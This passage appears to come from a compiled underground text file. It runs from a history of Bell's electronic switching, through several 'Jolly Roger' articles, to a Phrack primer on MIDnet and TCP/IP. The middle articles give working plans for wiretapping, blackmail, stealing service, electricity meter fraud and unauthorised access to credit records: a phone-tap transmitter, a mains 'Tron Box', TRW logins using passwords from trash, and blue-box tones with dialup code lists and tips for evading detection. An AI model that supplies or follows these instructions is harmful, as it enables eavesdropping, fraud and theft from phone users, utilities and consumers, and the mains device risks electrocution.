back in the 1930s. After successful
accomplishment of that planned miracle in 1947-48, further delays were brought
about by financial stringency and the need for further development of the
transistor itself. In the early 1950s, a Labs
team began serious work on electronic switching. As early as 1955, Western
Electric became involved when five engineers from the Hawthorne works were
assigned to collaborate with the Labs on
the project. The president of AT&T in 1956, wrote confidently, "At Bell Labs,
development of the new electronic switching system is going full speed ahead. We
are sure this will lead to many
improvements in service and also to greater efficiency. The first service trial
will start in Morris, Ill., in 1959." Shortly thereafter, Kappel said that the
cost of the whole project would probably be $45
million.
But it gradually became apparent that the development of a commercially usable
electronic switching system - in effect, a computerized telephone exchange -
presented vastly greater technical problems
than had been anticipated, and that, accordingly, Bell Labs had vastly
underestimated both the time and the investment needed to do the job. The year
1959 passed without the promised first trial at
Morris, Illinois; it was finally made in November 1960, and quickly showed how
much more work remained to be done. As time dragged on and costs mounted, there
was a concern at AT&T and
something approaching panic at Bell Labs. But the project had to go forward; by
this time the investment was too great to be sacrificed, and in any case,
forward projections of increased demand for
telephone service indicated that within a few years a time would come when,
without the quantum leap in speed and flexibility that electronic switching
would provide, the national network would be
unable to meet the demand. In November 1963, an all-electronic switching system
went into use at the Brown Engineering Company at Cocoa Beach, Florida. But this
was a small installation,
essentially another test installation, serving only a single company. Kappel's
tone on the subject in the 1964 annual report was, for him, an almost
apologetic: "Electronic switching equipment must be
manufactured in volume to unprecedented standards of reliability.... To turn out
the equipment economically and with good speed, mass production methods must be
developed; but, at the same time,
there can be no loss of precision..." Another year and millions of dollars
later, on May 30, 1965, the first commercial electric central office was put
into service at Succasunna, New Jersey.
Even at Succasunna, only 200 of the town's 4,300 subscribers initially had the
benefit of electronic switching's added speed and additional services, such as
provision for three party conversations and
automatic transfer of incoming calls. But after that, ESS was on its way. In
January 1966, the second commercial installation, this one serving 2,900
telephones, went into service in Chase, Maryland.
By the end of 1967 there were additional ESS offices in California, Connecticut,
Minnesota, Georgia, NY, Florida, and Pennsylvania; by the end of 1970 there were
120 offices serving 1.8 million
customers; and by 1974 there were 475 offices serving 5.6 million customers.
The difference between conventional switching and electronic switching is the
difference between "hardware" and "software"; in the former case, maintenance is
done on the spot, with screwdriver and
pliers, while in the case of electronic switching, it can be done remotely, by
computer, from a central point, making it possible to have only one or two
technicians on duty at a time at each switching
center. The development program, when the final figures were added up, was found
to have required a staggering four thousand man-years of work at Bell Labs and
to have cost not $45 million but
$500 million!
117.The Lunch Box by The Jolly Roger
Introduction
The Lunch Box is a VERY simple transmitter which can be handy for all sorts of
things. It is quite small and can easily be put in a number of places. I have
successfully used it for tapping fones, getting
inside info, blackmail and other such things. The possibilities are endless. I
will also include the plans or an equally small receiver for your newly made
toy. Use it for just about anything. You can also
make the transmitter and receiver together in one box and use it as a walkie
talkie.
Materials you will need
· (1) 9 volt battery with battery clip
· (1) 25-mfd, 15 volt electrolytic capacitor
· (2) .0047 mfd capacitors
· (1) .022 mfd capacitor
· (1) 51 pf capacitor
· (1) 365 pf variable capacitor
· (1) Transistor antenna coil
· (1) 2N366 transistor
· (1) 2N464 transistor
· (1) 100k resistor
· (1) 5.6k resistor
· (1) 10k resistor
· (1) 2meg potentiometer with SPST switch
· Some good wire, solder, soldering iron, board to put it on, box (optional)
Schematic for The Lunch Box
This may get a tad confusing but just print it out and pay attention.
[!]
!
51 pf
!
---+---- ------------base collector
! )( 2N366 +----+------/\/\/----GND
365 pf () emitter !
! )( ! !
+-------- ---+---- ! !
! ! ! ! !
GND / .022mfd ! !
10k\ ! ! !
/ GND +------------------------emitter
! ! ! 2N464
/ .0047 ! base collector
2meg \----+ ! ! +--------+ !
/ ! GND ! ! !
GND ! ! !
+-------------+.0047+--------------------+ ! !
! +--25mfd-----+
-----------------------------------------+ ! !
microphone +--/\/\/-----+
---------------------------------------------+ 100k !
!
GND---->/<---------------------!+!+!+---------------+
switch Battery
from 2meg pot.
Notes about the schematic
1. GND means ground
2. The GND near the switch and the GND by the 2meg potentiometer should be
connected.
3. Where you see: )(
()
)( it is the transistor antenna coil with 15 turns of regular hook-up wire
around it.
4. The middle of the loop on the left side (the left of "()") you should run a
wire down to the "+" which has nothing attached to it. There is a .0047
capacitor on the correct piece of wire.
5. For the microphone use a magnetic earphone (1k to 2k).
6. Where you see "[!]" is the antenna. Use about 8 feet of wire to broadcast
approx. 300ft. Part 15 of the FCC rules and regulation says you can't broadcast
over 300 feet without a license.
(Hahaha). Use more wire for an antenna for longer distances. (Attach it to the
black wire on the fone line for about a 250 foot antenna!)
Operation of the Lunch Box
This transmitter will send the signals over the AM radio band. You use the
variable capacitor to adjust what freq. you want to use. Find a good unused
freq. down at the lower end of the scale and
you're set. Use the 2 meg pot. to adjust gain. Just fuck with it until you get
what sounds good. The switch on the 2meg is for turning the Lunch Box on and
off. When everything is adjusted, turn on an
AM radio adjust it to where you think the signal is. Have a friend lay some shit
thru the Box and tune in to it. That's all there is to it. The plans for a
simple receiver are shown below:
The Lunch Box receiver
· (1) 9 volt battery with battery clip
· (1) 365 pf variable capacitor
· (1) 51 pf capacitor
· (1) 1N38B diode
· (1) Transistor antenna coil
· (1) 2N366 transistor
· (1) SPST toggle switch
· (1) 1k to 2k magnetic earphone
Schematic for receiver
[!]
!
51 pf
!
+----+----+
! !
) 365 pf
(----+ !
) ! !
+---------+---GND
!
+---*>!----base collector-----
diode 2N366 earphone
emitter +-----
! !
GND !
-
+
- battery
+
GND------>/<------------+
switch
Closing statement
This two devices can be built for under a total of $10.00. Not too bad. Using
these devices in illegal ways is your option. If you get caught, I accept NO
responsibility for your actions. This can be a lot
of fun if used correctly. Hook it up to the red wire on the phone line and it
will send the conversation over the air waves.
118.Olive Box Plans by The Jolly Roger
This is a relatively new box, and all it basically does is serve as a phone
ringer. You have two choices for ringers, a piezoelectric transducer (ringer),
or a standard 8 ohm speaker. The speaker has a
more pleasant tone to it, but either will do fine. This circuit can also be used
in conjunction with a rust box to control an external something or other when
the phone rings. Just connect the 8 ohm
speaker output to the inputs on the rust box, and control the pot to tune it to
light the light (which can be replaced by a relay for external controlling) when
the phone rings.
______________
| | ^
NC --|-- 5 4 --|-----/\/\/------->G
| | / R2
G<----)|----|-- 6 3 --|-- NC
| C3 | U1 |
-------|-- 7 2 --|---------- --- -- - > TO RINGER
| |
----|-- 8 1 --|--
| |______________| |
| ---/\/\/----|(----- L1
| R1 C1
------------------------------------------ L2
a. Main ringer TTL circuit
(>::::::::::::::::::::::::::::::::::::::::::::::::::::::::<)
_
FROM PIN 2 < - -- --- ----------| |_| |------------->G
P1
b. Piezoelectric transducer
(>::::::::::::::::::::::::::::::::::::::::::::::::::::::::<)
__ /|
FROM PIN 2 < - -- --- ---------|(---------. .-------| |/ |
>||< |S1| |
>||< --| | |
>||< | |__|\ |
G<---------.>||<.--- \|
T1
c. Electromagnetic transducer
Parts List
· U1 - Texas Instruments TCM1506
· T1 - 4000:8 ohm audio transformer
· S1 - 8 ohm speaker
· R1 - 2.2k resistor
· R2 - External variable resistor; adjusts timing frequency
· C1 - .47uF capacitor
· C2 - .1uF capacitor
· C3 - 10uF capacitor
· L1 - Tip
· L2 - Ring
· L1 and L2 are the phone line.
Shift Rate:
This is the formula for determining the shift rate:
1 1
SR = --------------------- = ------------ = 6¼ Hz
(DSR(1/f1)+DSR(1/f2)) 128 128
---- + ----
1714 1500
· DSR = Shift Devider Rate ratio = 128
· f1 = High Output Frequency = 1714
· f2 = Low Output Frequency = 1500
119.The Tron Box by The GREAT Captain Crunch!!
------------------R-----F----
I I I I
I I I I-
(C) (C) (C)
I I I I-
I I I I
-----------------------------
· (C)=capacitor
· F =fuse
· R =resistor
· I,- are wire
Parts List:
· (3) electrolytic capacitors rated at 50V(lowest) .47UF
· (1) 20-30 OHM ½ Watt resistor
· (1) 120Volt fuse (amp rating best to use at least half of total house current
or even less it keeps you from blowing your breaker just in case...)
· (1) power cord (cut up an extension cord. Need plug part and wire)
· (1) electrically insulated box for the rest of us. If your don't feel
comfortable about electricity then don't play with this. There is voltage
present that will ***kill you***.
The thing works when the load in your house is low like at night time. It will
put a reverse phase signal on the line and cancel out the other phase and put a
reverse phase running everything in the house.
Well if you have ever switched the power leads on a D\C (battery powered) motor
you will see that it runs backwards well your electric meter sort of works this
way...so reverse phase makes the
meter slow down and if your lucky it will go backwards. Anyway it means a
cheaper electric bill.
120.More TRW Info by The Jolly Roger
TRW is a large database in which company's and banks can run credit checks on
their customers. Example: John Jones orders $500 worth of stereo equipment from
the Joe Blow Electronic
distributing Co. Well it could be that he gave the company a phony credit card
number, or doesn't have enough credit, etc. Well they call up TRW and then run a
check on him, TRW then lists his card
numbers (everything from sears to visa) and tells the numbers, credit, when he
lost it last (if he ever did) and then of course tells if he has had any prior
problems paying his bills.
I would also like to add that although TRW contains information on millions of
people, not every part of the country is served, although the major area are..
So if you hate someone and live in a small
state, you probably wont be able to order him 300 pink toilet seats from K-mart.
Logging on
To log on, you dial-up your local access number (or long-distance, what ever
turns you on) and wait for it to say "TRW" at this prompt, you type either an
"A" or a "Ctrl-G" and it will say "circuit
building in progress" it will wait for a minute and then clear the screen, now
you will type one of the following.
Tca1
Tca2
Tnj1
Tga1
This is to tell it what geographical area the customer is in, it really doesn't
matter which you use, because TRW will automatically switch when it finds the
record..
Next, you will type in the pswd and info on the person you are trying to get
credit info on. You type it in a format like this:
Rts Pswd Lname Fname ...,House number First letter of street name Zip <cr> now
you type ctrl s and 2 ctrl-Q's here is what it looks like in real life:
Ae: Dialing xxx-xxx-xxxx
(screen clear)
TRW ^G
circuit building in progress
(pause . . . screen clear)
Tca1
Rtc 3966785-cm5 Johnson David ...,4567
R 56785
^s ^q ^q
and then it will wait for a few seconds and print out the file on him (if it can
locate one for the guy)
Note: You may have to push return when you first connect to get the systems
attention.
Getting Your Passwords
To obtain pswds, you go down to your favorite bank or sears store and dig
through the trash (hence the name trashing) looking for printouts, if they are a
big enough place, and live in a TRW area, then
they will probably have some. The printouts will have the 7 digit subscriber
code, leaving the 3-4 digit pswd up to you. Much like trashing down at good old
ma bell.
121.Phreaker's Phunhouse by the Jolly Roger
The long awaited prequil to Phreaker's Guide has finally arrived. Conceived from
the boredom and loneliness that could only be derived from: The Traveler! But
now, he has returned in full strength
(after a small vacation) and is here to 'World Premiere' the new files
everywhere. Stay cool. This is the prequil to the first one, so just relax. This
is not made to be an exclusive ultra elite file, so kinda
calm down and watch in the background if you are too cool for it.
Phreak Dictionary
Here you will find some of the basic but necessary terms that should be known by
any phreak who wants to be respected at all.
Phreak:
1. The action of using mischievous and mostly illegal ways in order to not pay
for some sort of telecommunications bill, order, transfer, or other service. It
often involves usage of highly illegal
boxes and machines in order to defeat the security that is set up to avoid this
sort of happening. [fr'eaking]. v.
2. A person who uses the above methods of destruction and chaos in order to make
a better life for all. A true phreaker will not go against his fellows or narc
on people who have ragged on
him or do anything termed to be dishonorable to phreaks. [fr'eek]. n.
3. A certain code or dialup useful in the action of being a phreak. (Example: "I
hacked a new metro phreak last night.")
Switching System:
1. There are 3 main switching systems currently employed in the US, and a few
other systems will be mentioned as background.
· SxS: This system was invented in 1918 and was employed in over half of the
country until 1978. It is a very basic system that is a general waste of energy
and hard work on the linesman. A
good way to identify this is that it requires a coin in the phone booth before
it will give you a dial tone, or that no call waiting, call forwarding, or any
other such service is available. Stands for: Step by
Step
· XB: This switching system was first employed in 1978 in order to take care of
most of the faults of SxS switching. Not only is it more efficient, but it also
can support different services in
various forms. XB1 is Crossbar Version 1. That is very limited and is hard to
distinguish from SxS except by direct view of the wiring involved. Next up was
XB4, Crossbar Version 4. With this
system, some of the basic things like DTMF that were not available with SxS can
be accomplished. For the final stroke of XB, XB5 was created. This is a service
that can allow DTMF plus most 800
type services (which were not always available.) Stands for: Crossbar.
· ESS: A nightmare in telecom. In vivid color, ESS is a pretty bad thing to have
to stand up to. It is quite simple to identify. Dialing 911 for emergencies, and
ANI [see ANI below] are the
most common facets of the dread system. ESS has the capability to list in a
person's caller log what number was called, how long the call took, and even the
status of the conversation (modem or
otherwise.) Since ESS has been employed, which has been very recently, it has
gone through many kinds of revisions. The latest system to date is ESS 11a, that
is employed in Washington D.C. for
security reasons. ESS is truly trouble for any phreak, because it is 'smarter'
than the other systems. For instance, if on your caller log they saw 50 calls to
1-800-421-9438, they would be able to do a
CN/A [see Loopholes below] on your number and determine whether you are
subscribed to that service or not. This makes most calls a hazard, because
although 800 numbers appear to be free, they
are recorded on your caller log and then right before you receive your bill it
deletes the billings for them. But before that the are open to inspection, which
is one reason why extended use of any code is
dangerous under ESS. Some of the boxes [see Boxing below] are unable to function
in ESS. It is generally a menace to the true phreak. Stands For: Electronic
Switching System. Because they could
appear on a filter somewhere or maybe it is just nice to know them anyways.
· SSS: Strowger Switching System. First non-operator system available.
· WES: Western Electronics Switching. Used about 40 years ago with some minor
places out west.
Boxing:
1. The use of personally designed boxes that emit or cancel electronical
impulses that allow simpler acting while phreaking. Through the use of separate
boxes, you can accomplish most feats
possible with or without the control of an operator.
2. Some boxes and their functions are listed below. Ones marked with '*'
indicate that they are not operatable in ESS.
· *Black Box:Makes it seem to the phone company that the phone was never picked
up.
· Blue Box: Emits a 2600hz tone that allows you to do such things as stack a
trunk line, kick the operator off line, and others.
· Red Box: Simulates the noise of a quarter, nickel, or dime being dropped into
a payphone.
· Cheese Box: Turns your home phone into a pay phone to throw off traces (a red
box is usually needed in order to call out.)
· *Clear Box: Gives you a dial tone on some of the old SxS payphones without
putting in a coin.
· Beige Box: A simpler produced linesman's handset that allows you to tap into
phone lines and extract by eavesdropping, or crossing wires, etc.
· Purple Box: Makes all calls made out from your house seem to be local calls.
ANI [ANI]:
1. Automatic Number Identification. A service available on ESS that allows a
phone service [see Dialups below] to record the number that any certain code was
dialed from along with the
number that was called and print both of these on the customer bill.
2. dialups [see Dialups below] are all designed just to use ANI. Some of the
services do not have the proper equipment to read the ANI impulses yet, but it
is impossible to see which is which
without being busted or not busted first.
Dialups [dy'l'ups]:
1. Any local or 800 extended outlet that allows instant access to any service
such as MCI, Sprint, or AT&T that from there can be used by hand-picking or
using a program to reveal other
peoples codes which can then be used moderately until they find out about it and
you must switch to another code (preferably before they find out about it.)
2. Dialups are extremely common on both senses. Some dialups reveal the company
that operates them as soon as you hear the tone. Others are much harder and some
you may never be
able to identify. A small list of dialups:
1-800-421-9438 (5 digit codes)
1-800-547-6754 (6 digit codes)
1-800-345-0008 (6 digit codes)
1-800-734-3478 (6 digit codes)
1-800-222-2255 (5 digit codes)
3. Codes: Codes are very easily accessed procedures when you call a dialup. They
will give you some sort of tone. If the tone does not end in 3 seconds, then
punch in the code and
immediately following the code, the number you are dialing but strike the '1' in
the beginning out first. If the tone does end, then punch in the code when the
tone ends. Then, it will give you another tone.
Punch in the number you are dialing, or a '9'. If you punch in a '9' and the
tone stops, then you messed up a little. If you punch in a tone and the tone
continues, then simply dial then number you are
calling without the '1'.
4. All codes are not universal. The only type that I know of that is truly
universal is Metrophone. Almost every major city has a local Metro dialup (for
Philadelphia, (215)351-0100/0126) and
since the codes are universal, almost every phreak has used them once or twice.
They do not employ ANI in any outlets that I know of, so feel free to check
through your books and call 555-1212 or,
as a more devious manor, subscribe yourself. Then, never use your own code. That
way, if they check up on you due to your caller log, they can usually find out
that you are subscribed. Not only that
but you could set a phreak hacker around that area and just let it hack away,
since they usually group them, and, as a bonus, you will have their local
dialup.
5. 950's. They seem like a perfectly cool phreakers dream. They are free from
your house, from payphones, from everywhere, and they host all of the major long
distance companies
(950)1044 <MCI>, (950)1077 <Sprint>, 950-1088 <S+ylines>, 950-1033 <US
Telecom>.) Well, they aren't. They were designed for ANI. That is the point, end
of discussion.
A phreak dictionary. If you remember all of the things contained on that file up
there, you may have a better chance of doing whatever it is you do. This next
section is maybe a little more
interesting...
Blue Box Plans:
These are some blue box plans, but first, be warned, there have been 2600hz tone
detectors out on operator trunk lines since XB4. The idea behind it is to use a
2600hz tone for a few very naughty
functions that can really make your day lighten up. But first, here are the
plans, or the heart of the file:
700 : 1 : 2 : 4 : 7 : 11 :
900 : + : 3 : 5 : 8 : 12 :
1100 : + : + : 6 : 9 : KP :
1300 : + : + : + : 10 : KP2 :
1500 : + : + : + : + : ST :
: 700 : 900 :1100 :1300 :1500 :
Stop! Before you diehard users start piecing those little tone tidbits together,
there is a simpler method. If you have an Apple-Cat with a program like Cat's
Meow IV, then you can generate the
necessary tones, the 2600hz tone, the KP tone, the KP2 tone, and the ST tone
through the dial section. So if you have that I will assume you can boot it up
and it works, and I'll do you the favor of
telling you and the other users what to do with the blue box now that you have
somehow constructed it. The connection to an operator is one of the most well
known and used ways of having fun with
your blue box. You simply dial a TSPS (Traffic Service Positioning Station, or
the operator you get when you dial '0') and blow a 2600hz tone through the line.
Watch out! Do not dial this direct! After
you have done that, it is quite simple to have fun with it. Blow a KP tone to
start a call, a ST tone to stop it, and a 2600hz tone to hang up. Once you have
connected to it, here are some fun numbers to
call with it:
0-700-456-1000 Teleconference (free, because you are the operator!)
(Area code)-101 Toll Switching
(Area code)-121 Local Operator (hehe)
(Area code)-131 Information
(Area code)-141 Rate & Route
(Area code)-181 Coin Refund Operator
(Area code)-11511 Conference operator (when you dial 800-544-6363)
Well, those were the tone matrix controllers for the blue box and some other
helpful stuff to help you to start out with. But those are only the functions
with the operator. There are other k-fun things
you can do with it.
More advanced Blue Box Stuff:
Oops. Small mistake up there. I forgot tone lengths. Um, you blow a tone pair
out for up to 1/10 of a second with another 1/10 second for silence between the
digits. KP tones should be sent for 2/10
of a second. One way to confuse the 2600hz traps is to send pink noise over the
channel (for all of you that have decent BSR equalizers, there is major pink
noise in there.)
Using the operator functions is the use of the 'inward' trunk line. That is
working it from the inside. From the 'outward' trunk, you can do such things as
make emergency breakthrough calls, tap into
lines, busy all of the lines in any trunk (called 'stacking'), enable or disable
the TSPS's, and for some 4a systems you can even re-route calls to anywhere.
All right. The one thing that every complete phreak guide should be without is
blue box plans, since they were once a vital part of phreaking. Another thing
that every complete file needs is a complete
listing of all of the 800 numbers around so you can have some more fun.
/-/ 800 Dialup Listings /-/
1-800-345-0008 (6) 1-800-547-6754 (6)
1-800-245-4890 (4) 1-800-327-9136 (4)
1-800-526-5305 (8) 1-800-858-9000 (3)
1-800-437-9895 (7) 1-800-245-7508 (5)
1-800-343-1844 (4) 1-800-322-1415 (6)
1-800-437-3478 (6) 1-800-325-7222 (6)
All right, set Cat Hacker 1.0 on those numbers and have a fuck of a day. That is
enough with 800 codes, by the time this gets around to you I don't know what
state those codes will be in, but try them
all out anyways and see what you get. On some 800 services now, they have an
operator who will answer and ask you for your code, and then your name. Some
will switch back and forth between
voice and tone verification, you can never be quite sure which you will be up
against.
Armed with this knowledge you should be having a pretty good time phreaking now.
But class isn't over yet, there are still a couple important rules that you
should know. If you hear continual clicking
on the line, then you should assume that an operator is messing with something,
maybe even listening in on you. It is a good idea to call someone back when the
phone starts doing that. If you were
using a code, use a different code and/or service to call him back.
A good way to detect if a code has gone bad or not is to listen when the number
has been dialed. If the code is bad you will probably hear the phone ringing
more clearly and more quickly than if you
were using a different code. If someone answers voice to it then you can
immediately assume that it is an operative for whatever company you are using.
The famed '311311' code for Metro is one of
those. You would have to be quite stupid to actually respond, because whoever
you ask for the operator will always say 'He's not in right now, can I have him
call you back?' and then they will ask for
your name and phone number. Some of the more sophisticated companies will
actually give you a carrier on a line that is supposed to give you a carrier and
then just have garbage flow across the
screen like it would with a bad connection. That is a feeble effort to make you
think that the code is still working and maybe get you to dial someone's voice,
a good test for the carrier trick is to dial a
number that will give you a carrier that you have never dialed with that code
before, that will allow you to determine whether the code is good or not. For
our next section, a lighter look at some of the
things that a phreak should not be without. A vocabulary.
A few months ago, it was a quite strange world for the modem people out there.
But now, a phreaker's vocabulary is essential if you wanna make a good
impression on people when you post what you
know about certain subjects.
/-/ Vocabulary /-/
- Do not misspell except certain exceptions:
phone -> fone
freak -> phreak
- Never substitute 'z's for 's's. (i.e. codez -> codes)
- Never leave many characters after a post (i.e. Hey Dudes!#!@#@!#!@)
- NEVER use the 'k' prefix (k-kool, k-rad, k-whatever)
- Do not abbreviate. (I got lotsa wares w/ docs)
- Never substitute '0' for 'o' (r0dent, l0zer).
- Forget about ye old upper case, it looks ruggyish.
All right, that was to relieve the tension of what is being drilled into your
minds at the moment. Now, however, back to the teaching course. Here are some
things you should know about phones and
billings for phones, etc.
LATA: Local Access Transference Area. Some people who live in large cities or
areas may be plagued by this problem. For instance, let's say you live in the
215 area code under the 542 prefix
(Ambler, Fort Washington). If you went to dial in a basic Metro code from that
area, for instance, 351-0100, that might not be counted under unlimited local
calling because it is out of your LATA.
For some LATA's, you have to dial a '1' without the area code before you can
dial the phone number. That could prove a hassle for us all if you didn't
realize you would be billed for that sort of call. In
that way, sometimes, it is better to be safe than sorry and phreak.
The Caller Log: In ESS regions, for every household around, the phone company
has something on you called a Caller Log. This shows every single number that
you dialed, and things can be arranged
so it showed every number that was calling to you. That's one main disadvantage
of ESS, it is mostly computerized so a number scan could be done like that quite
easily. Using a dialup is an easy way
to screw that, and is something worth remembering. Anyways, with the caller log,
they check up and see what you dialed. Hmm... you dialed 15 different 800
numbers that month. Soon they find that
you are subscribed to none of those companies. But that is not the only thing.
Most people would imagine "But wait! 800 numbers don't show up on my phone
bill!". To those people, it is a nice
thought, but 800 numbers are picked up on the caller log until right before they
are sent off to you. So they can check right up on you before they send it away
and can note the fact that you fucked up
slightly and called one too many 800 lines.
Right now, after all of that, you should have a pretty good idea of how to grow
up as a good phreak. Follow these guidelines, don't show off, and don't take
unnecessary risks when phreaking or
hacking.
122.Phrack Magazine - Vol. 3, Issue 27 by Knight Lightning
Prologue
If you are not already familiar with NSFnet, I would suggest that you read:
"Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of 13), and definitely;
"NSFnet: National Science Foundation
Network" (Phrack Inc., Volume Three, Issue 26, File 4 of 11).
Introduction
MIDNET is a regional computer network that is part of the NSFnet, the National
Science Foundation Network. Currently, eleven mid-United States universities
are connected to each other and to the NSFnet via MIDnet:
UA - University of Arkansas at Fayetteville
ISU - Iowa State University at Ames
UI - University of Iowa at Iowa City
KSU - Kansas State University at Manhattan
KU - University of Kansas at Lawrence
UMC - University of Missouri at Columbia
WU - Washington University at St. Louis, Missouri
UNL - University of Nebraska at Lincoln
OSU - Oklahoma State University at Stillwater
UT - University of Tulsa (Oklahoma)
OU - University of Oklahoma at Norman
Researchers at any of these universities that have funded grants can access the
six supercomputer centers funded by the NSF:
John Von Neuman Supercomputer Center
National Center for Atmospheric Research
Cornell National Supercomputer Facility
National Center for Supercomputing Applications
Pittsburgh Supercomputing Center
San Diego Supercomputing Center
In addition, researchers and scientists can communicate with each other over a
vast world-wide computer network that includes the NSFnet, ARPAnet, CSnet,
BITnet, and others that you have read
about in The Future Transcendent Saga. Please refer to "Frontiers" (Phrack Inc.,
Volume Two, Issue 24, File 4 of 13) for more details.
MIDnet is just one of several regional computer networks that comprise the
NSFnet system. Although all of these regional computer networks work the same,
MIDnet is the only one that I have direct
access to and so this file is written from a MIDnet point of view. For people
who have access to the other regional networks of NSFnet, the only real
differences depicted in this file that would not
apply to the other regional networks are the universities that are served by
MIDnet as opposed to:
NYSERnet in New York State
SURAnet in the southeastern United States
SEQSUInet in Texas
BARRnet in the San Francisco area
MERIT in Michigan
(There are others that are currently being constructed.)
These regional networks all hook into the NSFnet backbone, which is a network
that connects the six supercomputer centers. For example, a person at Kansas
State University can connect with a
supercomputer via MIDnet and the NSFnet backbone. That researcher can also send
mail to colleagues at the University of Delaware by using MIDnet, NSFnet and
SURAnet. Each university has its
own local computer network which connects on-campus computers as well as
providing a means to connecting to a regional network.
Some universities are already connected to older networks such as CSnet, the
ARPAnet and BITnet. In principal, any campus connected to any of these networks
can access anyone else in any other
network since there are gateways between the networks.
Gateways are specialized computers that forward network traffic, thereby
connecting networks. In practice, these wide-area networks use different
networking technology which make it impossible to
provide full functionality across the gateways. However, mail is almost
universally supported across all gateways, so that a person at a BITnet site can
send mail messages to a colleague at an ARPAnet
site (or anywhere else for that matter). You should already be somewhat familiar
with this, but if not refer to; "Limbo To Infinity" (Phrack Inc., Volume Two,
Issue 24, File 3 of 13) and "Internet
Domains" (Phrack Inc., Volume Three, Issue 26, File 8 of 11)
Computer networks rely on hardware and software that allow computers to
communicate. The language that enables network communication is called a
protocol. There are many different protocols in
use today. MIDnet uses the TCP/IP protocols, also known as the DOD (Department
of Defense) Protocol Suite.
Other networks that use TCP/IP include ARPAnet, CSnet and the NSFnet. In fact,
all the regional networks that are linked to the NSFnet backbone are required to
use TCP/IP. At the local campus
level, TCP/IP is often used, although other protocols such as IBM's SNA and
DEC's DECnet are common. In order to communicate with a computer via MIDnet and
the NSFnet, a computer at a
campus must use TCP/IP directly or use a gateway that will translate its
protocols into TCP/IP.
The Internet is a world-wide computer network that is the conglomeration of most
of the large wide area networks, including ARPAnet, CSnet, NSFnet, and the
regionals, such as MIDnet. To a lesser
degree, other networks such as BITnet that can send mail to hosts on these
networks are included as part of the Internet. This huge network of networks,
the Internet, as you have by now read all
about in the pages of Phrack Inc., is a rapidly growing and very complex entity
that allows sophisticated communication between scientists, students, government
officials and others. Being a part of this
community is both exciting and challenging.
This chapter of the Future Transcendent Saga gives a general description of the
protocols and software used in MIDnet and the NSFNet. A discussion of several of
the more commonly used
networking tools is also included to enable you to make practical use of the
network as soon as possible.
The DOD Protocol Suite
The DOD Protocol Suite includes many different protocols. Each protocol is a
specification of how communication is to occur between computers. Computer
hardware and software vendors use the
protocol to create programs and sometimes specialized hardware in order to
implement the network function intended by the protocol. Different
implementations of the same protocol exist for the
varied hardware and operating systems found in a network.
The three most commonly used network functions are:
Mail -- Sending and receiving messages
File Transfer -- Sending and receiving files
Remote Login -- Logging into a distant computer
Of these, mail is probably the most commonly used.
In the TCP/IP world, there are three different protocols that realize these
functions:
SMTP -- (Simple Mail Transfer Protocol) Mail
FTP -- (File Transfer Protocol) sending and receiving files
Telnet -- Remote login
How to use these protocols is discussed in the next section. At first glance, it
is not obvious why these three functions are the most common. After all, mail
and file transfer seem to be the same thing.
However, mail messages are not identical to files, since they are usually
comprised of only ASCII characters and are sequential in structure. Files may
contain binary data and have complicated,
non-sequential structures. Also, mail messages can usually tolerate some errors
in transmission whereas files should not contain any errors. Finally, file
transfers usually occur in a secure setting (i.e. The
users who are transferring files know each other's names and passwords and are
permitted to transfer the file, whereas mail can be sent to anybody as long as
their name is known).
While mail and transfer accomplish the transfer of raw information from one
computer to another, Telnet allows a distant user to process that information,
either by logging in to a remote computer or by
linking to another terminal. Telnet is most often used to remotely log in to a
distant computer, but it is actually a general-purpose communications protocol.
I have found it incredibly useful over the last
year. In some ways, it could be used for a great deal of access because you can
directly connect to another computer anywhere that has TCP/IP capabilities,
however please note that Telnet is
*NOT* Telenet. There are other functions that some networks provide, including
the following:
· Name to address translation for networks, computers and people
· The current time
· Quote of the day or fortune
· Printing on a remote printer, or use of any other remote peripheral
· Submission of batch jobs for non-interactive execution
· Dialogues and conferencing between multiple users
· Remote procedure call (i.e. Distributing program execution over several remote
computers)
· Transmission of voice or video information
Some of these functions are still in the experimental stages and require faster
computer networks than currently exist. In the future, new functions will
undoubtedly be invented and existing ones
improved.
The DOD Protocol Suite is a layered network architecture, which means that
network functions are performed by different programs that work independently
and in harmony with each other. Not only
are there different programs but there are different protocols. The protocols
SMTP, FTP and Telnet are described above. Protocols have been defined for
getting the current time, the quote of the day,
and for translating names. These protocols are called applications protocols
because users directly interact with the programs that implement these
protocols.
The Transmission Control Protocol, TCP, is used by many of the application
protocols. Users almost never interact with TCP directly. TCP establishes a
reliable end-to-end connection between two
processes on remote computers. Data is sent through a network in small chunks
called packets to improve reliability and performance. TCP ensures that packets
arrive in order and without errors. If a
packet does have errors, TCP requests that the packet be retransmitted.
In turn, TCP calls upon IP, Internet Protocol, to move the data from one network
to another. IP is still not the lowest layer of the architecture, since there is
usually a "data link layer protocol" below it.
This can be any of a number of different protocols, two very common ones being
X.25 and Ethernet.
FTP, Telnet and SMTP are called "application protocols", since they are directly
used by applications programs that enable users to make use of the network.
Network applications are the actual
programs that implement these protocols and provide an interface between the
user and the computer. An implementation of a network protocol is a program or
package of programs that provides the
desired network function such as file transfer. Since computers differ from
vendor to vendor (e.g. IBM, DEC, CDC), each computer must have its own
implementation of these protocols. However,
the protocols are standardized so that computers can interpolate over the
network (i.e. Can understand and process each other's data). For example, a TCP
packet generated by an IBM computer can
be read and processed by a DEC computer.
In many instances, network applications programs use the name of the protocol.
For example, the program that transfers files may be called "FTP" and the
program that allows remote logins may be
called "Telnet." Sometimes these protocols are incorporated into larger
packages, as is common with SMTP. Many computers have mail programs that allow
users on the same computer to send mail
to each other. SMTP functions are often added to these mail programs so that
users can also send and receive mail through a network. In such cases, there is
no separate program called SMTP that
the user can access, since the mail program provides the user interface to this
network function.
Specific implementation of network protocols, such as FTP, are tailored to the
computer hardware and operating system on which they are used. Therefore, the
exact user interface varies from one
implementation to another. For example, the FTP protocol specifies a set of FTP
commands which each FTP implementation must understand and process. However,
these are usually placed at a low
level, often invisible to the user, who is given a higher set of commands to
use.
These higher-level commands are not standardized so they may vary from one
implementation of FTP to another. For some operating systems, not all of these
commands make equal sense, such as
"Change Directory," or may have different meanings. Therefore the specific user
interface that the user sees will probably differ.
This file describes a generic implementation of the standard TCP/IP application
protocols. Users must consult local documentation for specifics at their sites.
Names and Addresses In A Network
In DOD Protocol Suite, each network is given a unique identifying number. This
number is assigned by a central authority, namely the Network Information Center
run by SRI, abbreviated as
SRI-NIC, in order to prevent more than one network from having the same network
number. For example, the ARPAnet has network number 10 while MIDnet has a longer
number, namely 128.242.
Each host in a network has a unique identification so other hosts can specify
